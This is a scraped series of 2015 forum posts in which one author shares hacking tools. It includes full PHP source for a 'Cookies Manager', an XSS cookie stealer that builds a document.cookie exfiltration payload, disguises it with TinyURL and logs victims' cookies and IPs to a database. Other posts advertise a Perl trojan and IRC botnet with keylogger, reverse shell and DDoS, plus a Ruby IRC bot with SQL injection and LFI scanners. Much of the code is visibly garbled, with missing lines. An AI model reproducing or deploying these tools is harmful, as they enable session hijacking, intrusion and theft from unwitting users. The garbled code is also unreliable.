41
Programming / PHP / [PHP] Cookies Manager 0.6
on: 18 December 2015, 21:41 pm
Today I bring you an improved version of this cookie stealer, which lets you capture, save and generate cookies for cookie theft using XSS.
It has the following options:
Cookie stealer with TinyURL generator
You can view the cookies that a page returns
You can create cookies with whatever data you want
Hidden panel with login; use ?poraca to find the login
An image:
The code:
index.php
<?php
// Cookies Manager 0.6
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
//
$index = "imagen.php" ; // Edit
if ( isset ( $_GET [ 'poraca' ] ) ) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br /><br />
Password : <input type=password size=30 name=password /><br /><br />
<input type=submit name=login style="width: 100px;" value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>' ;
if ( isset ( $_POST [ 'login' ] ) ) {
$test_username = $_POST [ 'username' ] ;
$test_password = md5 ( $_POST [ 'password' ] ) ;
if ( $test_username == $username && $test_password == $password ) {
echo "<script>alert('Welcome idiot');</script>" ;
$ruta = "http://" . $_SERVER [ 'HTTP_HOST' ] . dirname ( $_SERVER [ 'PHP_SELF' ] ) . "/" . $index ;
echo '<meta http-equiv="refresh" content="0; url=' . htmlentities ( $ruta ) . '" />' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
imagen.php
<?php
// Cookies Manager 0.6
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
// DB
$host = "localhost" ; // Edit
$userw = "root" ; // Edit
$passw = "" ; // Edit
$db = "cookies" ; // Edit
// Functions
function hex_encode( $text )
{
return $texto = '%' . substr ( $texto , 0 , strlen ( $texto ) - 1 ) ; }
function parsear_cookie( $leyendo )
{
$contenido = explode ( ";" , $leyendo ) ;
$nombre = "" ;
$valor_cookie = "" ;
$expires = "" ;
$path = "" ;
$domain = "" ;
$secure = "false" ;
$httponly = "false" ;
foreach ( $contenido as $valor ) {
if ( preg_match ( "/expires=(.*)/" , $valor , $regex ) ) { $expires = $regex [ 1 ] ;
}
elseif ( preg_match ( "/path=(.*)/" , $valor , $regex ) ) { $path = $regex [ 1 ] ;
} elseif ( preg_match ( "/domain=(.*)/" , $valor , $regex ) ) { $domain = $regex [ 1 ] ;
} elseif ( preg_match ( "/secure=(.*)/" , $valor , $regex ) ) { $secure = $regex [ 1 ] ;
} elseif ( preg_match ( "/httponly=(.*)/" , $valor , $regex ) ) { $httponly = $regex [ 1 ] ;
}
else {
$nombre = $regex [ 1 ] ;
$valor_cookie = $regex [ 2 ] ;
}
}
}
$nombre ,
$valor_cookie ,
$expires ,
$path ,
$domain ,
$secure ,
$httponly
) ;
}
function ver_cookies_de_pagina( $pagina )
{
$cookies = "" ;
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
)
) ;
foreach ( $http_response_header as $valores ) {
$cookies = $cookies . trim ( $valores ) . "\n " ; }
}
} else {
curl_setopt ( $nave , CURLOPT_USERAGENT
, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" ) ;
foreach ( $leyendo as $valores ) {
$cookies = $cookies . trim ( $valores ) . "\n " ; }
}
}
return $cookies ;
}
function toma( $target )
{
$code = "" ;
curl_setopt ( $nave , CURLOPT_USERAGENT
, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' ) ; } else {
'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
)
) ;
}
return $code ;
}
//
if ( isset ( $_GET [ 'id' ] ) ) {
if ( empty ( $_GET [ 'id' ] ) ) { error( ) ;
}
if ( $ip == "::1" ) {
$ip = "127.0.0.1" ;
}
mysql_query ( "INSERT INTO cookies_found(id,fecha,ip,info,cookie) values(NULL,'$dia ','$ip ','$info ','$cookie ')" ) ;
header ( "Location:http://www.google.com.ar" ) ;
}
elseif ( isset ( $_COOKIE [ 'login' ] ) ) {
$user = $plit [ 0 ] ;
$pass = $plit [ 1 ] ;
if ( $user == $username and $pass == $password ) {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Cookies Manager 0.6</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="images/icono.png">
</head>
<body>
<center>' ;
echo '<br><img src="images/cookies.png" /><br>' ;
if ( isset ( $_POST [ 'makecookies' ] ) ) {
if ( setcookie ( $_POST [ 'name_cookie' ] , $_POST [ 'value_cookie' ] , time ( ) + 7200 , $_POST [ 'path_cookie' ] , $_POST [ 'domain_cookie' ] ) ) { echo "<script>alert('Cookie maked');</script>" ;
} else {
echo "<script>alert('Error making Cookie');</script>" ;
}
}
$edit_name = "" ;
$edit_value = "" ;
$edit_expire = "" ;
$edit_path = "" ;
$edit_domain = "" ;
$edit_secure = "" ;
$edit_httponline = "" ;
if ( isset ( $_POST [ 'instalar' ] ) ) {
$cookies_found = "create table cookies_found (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
fecha TEXT NOT NULL,
ip TEXT NOT NULL,
info TEXT NOT NULL,
cookie TEXT NOT NULL,
PRIMARY KEY (id));
" ;
echo "<script>alert('Installed');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
//
if ( isset ( $_GET [ 'del' ] ) ) { if ( @ mysql_query ( "delete from cookies_found where id='" . $_GET [ 'del' ] . "'" ) ) { echo "<script>alert('Cookie deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
// Cookies Found
$re = mysql_query ( "select * from cookies_found order by id ASC" ) ; echo '
<div class="post">
<h3>Cookies Found : ' . $con . '</h3>
<div class="post_body"><br>' ;
if ( $con <= 0 ) {
echo '<b>No cookies found</b><br>' ;
} else {
echo '<table>' ;
echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>" ;
$cookies_view = $ver [ 4 ] ;
list ( $nombre , $valor_cookie , $expires , $path , $domain , $secure , $httponly ) = parsear_cookie
( $cookies_view ) ;
}
echo "</table>" ;
}
echo ' <br></div>
</div>' ;
//
// Form for the target
echo '
<div class="post">
<h3>Enter Target</h3>
<div class="post_body"><br>' ;
echo "
<form action='' method=POST>
<b>Link : </b><input type=text size=40 name=target value='http://localhost/dhlabs/xss/index.php?msg='=></td><tr>
<input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'> <input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td>
</form>
" ;
echo ' <br></div>
</div>' ;
// URLS
if ( isset ( $_POST [ 'generateurl' ] ) ) {
echo '
<div class="post">
<h3>Console</h3>
<div class="post_body"><br>' ;
echo "<textarea cols=50 name=code readonly>\n " ;
$script = hex_encode( "<script>document.location='http://" . $_SERVER [ 'HTTP_HOST' ] . $_SERVER [ 'PHP_SELF' ] . "?id='+document.cookie;</script>" ) ;
//echo "http://tinyurl.com/api-create.php?url=".$_POST['target'].$script."\n";
$resultado_code = toma( "http://tinyurl.com/api-create.php?url=" . $_POST [ 'target' ] . $script ) ;
echo "\n </textarea></table>" ;
echo ' <br><br></div>
</div>' ;
}
//
// Get Cookies
if ( isset ( $_POST [ 'getcookies' ] ) ) {
echo '
<div class="post">
<h3>Console</h3>
<div class="post_body"><br>' ;
echo "<textarea cols=50 rows=10 name=code readonly>\n " ;
$resultado_code = ver_cookies_de_pagina( $_POST [ 'target' ] ) ;
echo "\n </textarea>" ;
echo ' <br><br></div>
</div>' ;
$leyendo_esto = split ( "\n " , $resultado_code ) ;
list ( $nombre , $valor_cookie , $expires , $path , $domain , $secure , $httponly ) = parsear_cookie
( $leyendo_esto [ 0 ] ) ;
$edit_name = $nombre ;
$edit_value = $valor_cookie ;
$edit_expire = $expires ;
$edit_path = $path ;
$edit_domain = $domain ;
$edit_secure = $secure ;
$edit_httponline = $httponly ;
}
//
// Form for creating cookies
echo '
<div class="post">
<h3>Cookie Maker</h3>
<div class="post_body"><br>' ;
echo "
<form action='' method=POST>
<b>Name : </b><input type=text size=50 name=name_cookie value='$edit_name '><br><br>
<b>Value : </b><input type=text size=50 name=value_cookie value='$edit_value '><br><br>
<b>Expires : </b><input type=text size=50 name=expire_cookie value='$edit_expire '><br><br>
<b>Path : </b><input type=text size=50 name=path_cookie value='$edit_path '><br><br>
<b>Domain : </b><input type=text size=50 name=domain_cookie value='$edit_domain '><br><br>
<b>Secure : </b><input type=text size=50 name=secure_cookie value='$edit_secure '><br><br>
<b>HTTP Online : </b><input type=text size=50 name=httponline_cookie value='$edit_httponline '><br><br>
<input type=submit name=makecookies style='height: 25px; width: 200px' value='Make Cookie'>
</form>" ;
echo ' <br></div>
</div>' ;
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">' ;
echo "
<form action='' method=POST>
<h2>Do you want install Cookies Manager ?</h2><br>
<input type=submit name=instalar value=Install>
</form><br>" ;
echo ' </div>
</div>' ;
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
style.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background : transparent url("images/fondo.jpg") repeat scroll 0 0 ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
textarea {
font : normal 10px Verdana, Arial, Helvetica, sans-serif ;
background-color : black ;
color : gray ;
border : solid #222 2px ;
border-color : gray
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
A video with usage examples:
VIDEO
If you want to download the program, you can do so here:
SourceForge.
Github.
42
Programming / PHP / [PHP] DH Chat 0.5
on: 4 December 2015, 16:23 pm
A simple chat I made in PHP, with the following options:
Only allows 10 messages, so it deletes by age
Filters bad words
Comments can be deleted from the administrator
An image:
The code:
index.php
<?php
// DH Chat 0.5
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
//
$index = "admin.php" ; // Edit
if ( isset ( $_GET [ 'poraca' ] ) ) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br /><br />
Password : <input type=password size=30 name=password /><br /><br />
<input type=submit name=login style="width: 100px;" value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>' ;
if ( isset ( $_POST [ 'login' ] ) ) {
$test_username = $_POST [ 'username' ] ;
$test_password = md5 ( $_POST [ 'password' ] ) ;
// Strict comparison: loose == treats numeric-looking hashes (0e...) as equal numbers
if ( $test_username === $username && $test_password === $password ) {
echo "<script>alert('Welcome idiot');</script>" ;
$ruta = "http://" . $_SERVER [ 'HTTP_HOST' ] . dirname ( $_SERVER [ 'PHP_SELF' ] ) . "/" . $index ;
echo '<meta http-equiv="refresh" content="0; url=' . htmlentities ( $ruta ) . '" />' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
admin.php
<?php
// DH Chat 0.5
// (C) Doddy Hackman 2015
// Login
$username = "admin" ; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3" ; // Edit
// DB
$host = "localhost" ; // Edit
$userw = "root" ; // Edit
$passw = "" ; // Edit
$db = "chat" ; // Edit
if ( isset ( $_COOKIE [ 'login' ] ) ) {
$user = $plit [ 0 ] ;
$pass = $plit [ 1 ] ;
if ( $user == $username and $pass == $password ) {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DH Chat 0.5</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center>
' ;
echo ' <br><img src="images/chat.png" /><br>' ;
if ( isset ( $_POST [ 'instalar' ] ) ) {
$todo = "create table mensajes (
id_comentario int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
apodo VARCHAR(255) NOT NULL,
PRIMARY KEY (id_comentario));
" ;
$todo2 = "create table insultos (
id_insulto int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
PRIMARY KEY (id_insulto));
" ;
"lammer" ,
"lamer" ,
"maricon" ,
"noob"
) ;
foreach ( $insultos as $con ) {
@ mysql_query ( "INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$con')" ) ;
}
echo "<script>alert('Installed');</script>" ;
echo '<meta http-equiv="refresh" content=0;URL=>' ;
}
} else {
echo "<script>alert('Error');</script>" ;
}
}
//
$re = mysql_query ( "select * from mensajes order by id_comentario ASC" ) ;
if ( isset ( $_GET [ 'id' ] ) ) {
// Cast to int so the request value cannot alter the SQL statement
if ( @ mysql_query ( "delete from mensajes where id_comentario='" . (int) $_GET [ 'id' ] . "'" ) ) {
echo "<script>alert('Comment deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
$sql = "select id_comentario from mensajes" ;
echo '
<div class="post">
<h3>Comments : ' . $cantidad . '</h3>
<div class="post_body"><br>' ;
if ( $cantidad <= 0 ) {
echo '<b>No entries found</b><br>' ;
} else {
echo "<table>" ;
echo "<td><b>ID</b></td><td><b>Nick</b></td><td><b>Text</b></td><td><b>Option</b></td><tr>" ;
}
echo "</table>" ;
}
echo ' <br></div>
</div>' ;
if ( isset ( $_POST [ 'new_word' ] ) ) {
// Escape the submitted word before placing it in the SQL string
$in = mysql_real_escape_string ( $_POST [ 'word' ] ) ;
if ( @ mysql_query ( "INSERT INTO insultos(id_insulto,mensaje)values(NULL,'$in')" ) ) {
echo "<script>alert('Word added');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
if ( isset ( $_GET [ 'del_word' ] ) ) {
// Cast to int so the request value cannot alter the SQL statement
if ( @ mysql_query ( "delete from insultos where id_insulto='" . (int) $_GET [ 'del_word' ] . "'" ) ) {
echo "<script>alert('Word deleted');</script>" ;
} else {
echo "<script>alert('Error');</script>" ;
}
}
}
echo '
<div class="post">
<h3>Block words</h3>
<div class="post_body"><br>
' ;
echo "
<form action='' method=POST>
<b>Word : </b><input type=text name=word>
<input type=submit name=new_word style='width: 100px;' value=Add>
</form>" ;
echo '
<br>
</div>
</div>
' ;
$sql = "select id_insulto from insultos" ;
echo '
<div class="post">
<h3>Words blocked : ' . $cantidad . '</h3>
<div class="post_body"><br>
' ;
$rea = mysql_query ( "select * from insultos order by id_insulto ASC" ) ;
if ( $cantidad <= 0 ) {
echo '<b>No entries found</b><br>' ;
} else {
echo "<table>" ;
echo "<td>ID</td><td>Word</td><td>Option</td><tr>" ;
}
echo "</table>" ;
}
echo '
<br>
</div>
</div>
' ;
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">' ;
echo "
<form action='' method=POST>
<h2>Do you want install DH Chat 0.5 ?</h2><br>
<input type=submit name=instalar style='width: 100px;' value=Install>
</form><br>" ;
echo ' </div>
</div>' ;
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>' ;
} else {
echo "<script>alert('Fuck You');</script>" ;
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />' ;
}
// The End ?
?>
style.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background : transparent url("images/fondo.jpg") repeat scroll 0 0 ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
word-wrap: break-word;
word-break: break-all;
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
chat.php
<?php
//DH Chat 0.5
//(C) Doddy Hackman 2015
// DB
$host = "localhost" ; // Edit
$user = "root" ; // Edit
$pass = "" ; // Edit
$db = "chat" ; // Edit
//
echo '<link href="chat.css" rel="stylesheet" type="text/css" />' ;
echo "<table border=0 width='210' style='table-layout: fixed'>" ;
echo "<td><b>DH Chat 0.5</b></td><tr>" ;
$sumo = mysql_query ( "SELECT MAX(id_comentario) FROM mensajes" ) ;
foreach ( $s as $d ) {
$total = $d ;
}
$test = $total - 10 ;
if ( $test <= 0 ) {
} else {
$resto = $test ;
for ( $i = 1 ; $i <= $resto ; $i ++ ) {
@ mysql_query ( "DELETE FROM mensajes where id_comentario='$i'" ) ;
}
}
$re = @ mysql_query ( "select * from mensajes order by id_comentario DESC" ) ;
}
echo "<br><br><td><br><b>Comment</b><br><br>
<form action='' method=POST>
Nick : <input type=text name=apodo size=20><br><br>
Text : <input type=text name=msg size=20><br><br>
<input type=submit name=chatentro style='width: 100px;' value=Send>
</form>
<tr>
<td><b>Coded By Doddy H</b></td><tr>
</table>" ;
if ( isset ( $_POST [ 'chatentro' ] ) ) {
$sumo = mysql_query ( "SELECT MAX(id_comentario) FROM mensajes" ) ;
foreach ( $s as $d ) {
$x_id = $d + 1 ;
}
$apodo = substr ( $apodo , 0 , 70 ) ;
$mensaje = substr ( $mensaje , 0 , 70 ) ;
}
@ mysql_query ( "INSERT INTO mensajes(id_comentario,apodo,mensaje)values('$x_id','$apodo','$mensaje')" ) ;
}
echo '<meta http-equiv="refresh" content=0;URL=>' ;
}
// The End ?
?>
chat.css
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
}
a:link {
text-decoration : none ;
color : orange;
}
a:visited {
color : orange;
}
a:hover {
color : orange;
}
td, tr {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
text-align : center ;
word-wrap: break-word;
word-break: break-all;
}
input {
border-style : solid ;
border-color : gray ;
border-width : 1px ;
background : black ;
border : solid #222 2px ;
color : gray ;
font-family :helvetica , arial, sans-serif ;
font-size : 14px ;
}
.post {
background-color : black ;
color : gray ;
margin-bottom : 10px ;
width : 600px ;
word-wrap: break-word;
}
.post h3 {
background-color : black ;
color : orange;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
.post_body {
background-color : black ;
margin : -20px 0 0 0 ;
color : white ;
background-color : #000 ;
border : solid #222 2px ;
-webkit-border-radius: 4px ;
-moz-border-radius: 4px ;
border-radius: 4px ;
padding : 5px 10px ;
}
/* The End ? */
test.php
<body background="test.jpg">
<?php
include ( "chat.php" ) ;
?>
If you want to download the program, you can do so from
here.
If you have any suggestion for improving this project, say so, so it can be improved.
Regards.
43
Programming / PHP / [PHP] DH Scanner 0.9
on: 20 November 2015, 23:53 pm
Improved version of this scanner in PHP, made to look for web vulnerabilities.
It has the following options:
Bing scanner with SQLI scanner included
SQLI scanner
LFI scanner
Crack several MD5 hashes
Administration panel finder
Locator for an IP and its DNS
Encoders for base64, HEX and MD5
An image:
A video with usage examples:
VIDEO
If you want to download the program, you can do so here:
SourceForge.
Github.
45
Programming / Scripting / [Perl] Project HellStorm 1.2
on: 24 October 2015, 03:06 am
Hello, today I bring you a trojan in Perl that works over sockets and as an IRC botnet; it has the following options:
[++] Trojan options
File browser: delete, rename
Gives information about the computer
Open and close the CD
Hide and show the taskbar or desktop icons
Make the computer speak so it says whatever we want
Send messages
Command console
Process administration
ReverseShell
Change desktop wallpaper
Move the mouse
Load Word so that it types by itself
DOS Attack: in the IRC case you can do a DDOS attack if you have several infected machines
Keylogger in the background: uploads logs and captured photos to an FTP server
An image:
If you want to download the program, you can do so here:
SourceForge.
Github.
That would be all.
47
Programming / Scripting / [Perl] Project Arsenal X 0.2
on: 9 October 2015, 22:14 pm
Today I bring you the new version of my Arsenal X project written in Perl; it is based on the game HackTheGame and has the following options:
Gmail Inbox Client Whois Ping Downloader Get IP Locate IP K0bra SQLI Scanner Crack several MD5 hashes Find administration panel Port Scanner Multi Cracker with support for FTP,TELNET,POP3 Command execution in the console
An image:
A video with usage examples:
VIDEO
If you want to download the program, you can do so here:
SourceForge.
Github.
That would be all.
48
Programming / Scripting / [Ruby] ClapTrap IRC Bot 0.5
on: 26 September 2015, 00:04 am
Ruby translation of my IRC bot called ClapTrap.
It has the following options:
SQLI scanner
LFI scanner
Administration panel finder
IP locator
DNS finder
SQLI and RFI finder on Google
Crack for MD5 hashes
URL shortener using tinyurl
HTTP FingerPrinting
base64, hex and ASCII encoder
The code:
#!usr/bin/ruby
#Claptrap IRC Bot 0.5
#(C) Doddy Hackman 2015
require "socket"
require "open-uri"
require "net/http"
require "resolv"
require "base64"
require "digest/md5"
$timeout = "1"
# Functions
def head( )
print "\n \n
@@@@ @ @ @@@@@ @@@@@ @@@@@ @ @@@@@ @ @@@@@ @@@@
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @@@@@ @ @@@@@ @ @ @@@@@ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @@@@@ @ @ @ @ @@@@@ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@@ @@@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@
\n \n "
end
def copyright( )
print "\n \n -- == (C) Doddy Hackman 2015 == --\n \n "
end
#
# Functions ClapTrap
def get_ip( hostname)
begin
return Resolv.getaddress ( hostname)
rescue
return "Error"
end
end
def toma( web)
begin
return open ( web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" ) .read
rescue
return "Error"
end
end
def response_code( web)
begin
return Net::HTTP .get_response ( URI ( web) ) .code
rescue
return "404"
end
end
def tomar( web,arg)
begin
headers = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" }
uri = URI ( web)
http = Net::HTTP .new ( uri.host , uri.port )
return http.post ( uri.path ,arg, headers) .body
rescue
return "Error"
end
end
def toma_ssl( web)
uri = URI .parse ( web)
nave = Net::HTTP .new ( uri.host , uri.port )
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get ( uri.request_uri ,{ "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0" } ) .body
end
def cortar( pages)
final = ""
finales = [ ]
pages.flatten .each do | page|
if page=~/ ( .* ) =( .* ) /
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push ( final)
end
end
return finales
end
def google( dork,pages)
links = [ ]
dork = dork.sub ( / / ,"+" )
contador = 0
for i in ( "1" ..pages )
contador+ =10
code = toma_ssl( "https://www.google.com.ar/search?hl=&q=" + dork+ "&start=" + contador.to_s )
paginas = code.scan ( / ( ?< ="r" >< . href =")(.+?)" / )
paginas.flatten .each do | pagina|
partes = pagina
if partes=~/ url\?q=( .* ) & amp;sa/
parte = $1
link = URI ::decode( parte)
links.push ( link)
end
end
end
links = links.uniq
return links
end
def google_recursive( dork,pages)
dork = dork.sub ( / / ,"+" )
contador = 0
guardo = [ ]
for i in ( "1" ..pages )
contador+ =10
url = "https://www.google.com.ar/search?hl=&q=" + dork+ "&start=" + contador.to_s
code = toma_ssl( url)
links = URI ::extract( code)
links.each do | link|
if link=~/ cache:( .* ?) :( .* ?) \+/
link_final = "http://" + $2
link_final = URI ::decode( link_final)
guardo.push ( link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def bing( dork,pages)
guardo = [ ]
dork = dork.sub ( / / ,"+" )
contador = 0
for i in ( "1" ..pages )
contador+ =10
code = toma( "http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s )
links = code.scan ( /< h2>< a href="(.*?)" h/ )
links.flatten .each do | link|
link_final = URI ::decode( link)
if not link_final=~/ http:\/ \/ 778802 \.r \.msn \.com \//
guardo.push ( link_final)
end
end
links = code.scan ( /< h3>< a href="(.*?)" h/ )
links.flatten .each do | link|
link_final = URI ::decode( link)
if not link_final=~/ http:\/ \/ 778802 \.r \.msn \.com \//
guardo.push ( link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def bypass( op)
if op=="--"
return "+" ,"--"
elsif op=="/*"
return "/**/" ,"/**/"
elsif op=="%20"
return "%20" ,"%00"
else
return "+" ,"--"
end
end
def decode_hex( text)
text = text.sub ( "0x" ,"" )
return [ text] .pack ( 'H*' )
end
def encode_hex( text)
return "0x" + text.unpack ( 'H*' ) [ 0 ]
end
def httpfinger( page)
respuesta = ""
begin
nave = Net::HTTP .start ( page)
headers = nave.head ( "/" )
headers.each do | name,value|
respuesta = respuesta + "[+] " + name+ " : " + value+ "\n "
end
nave.finish
rescue
respuesta = "Error"
end
return respuesta
end
##
def locateip( target)
resultado = ""
resultado = resultado + "\n [+] Getting IP ...\n "
ip = get_ip( target)
resultado = resultado + "\n [+] IP : " + ip+ "\n "
web = "http://www.melissadata.com/lookups/iplocation.asp"
resultado = resultado + "\n [+] Locating ...\n \n "
code = tomar( web,"ipaddress=" + ip+ "&btn=Submit" )
if code=~/ City< \/ td>< td align=( .* ) >< b> ( .* ) < \/ b>< \/ td>/
resultado = resultado + "[+] City : " + $2+ "\n "
else
resultado = resultado + "[+] City : Not Found\n "
end
if code=~/ Country< \/ td>< td align=( .* ) >< b> ( .* ) < \/ b>< \/ td>/
resultado = resultado + "[+] Country : " + $2+ "\n "
else
resultado = resultado + "[+] Country : Not Found\n "
end
if code=~/ State or Region< \/ td>< td align=( .* ) >< b> ( .* ) < \/ b>< \/ td>/
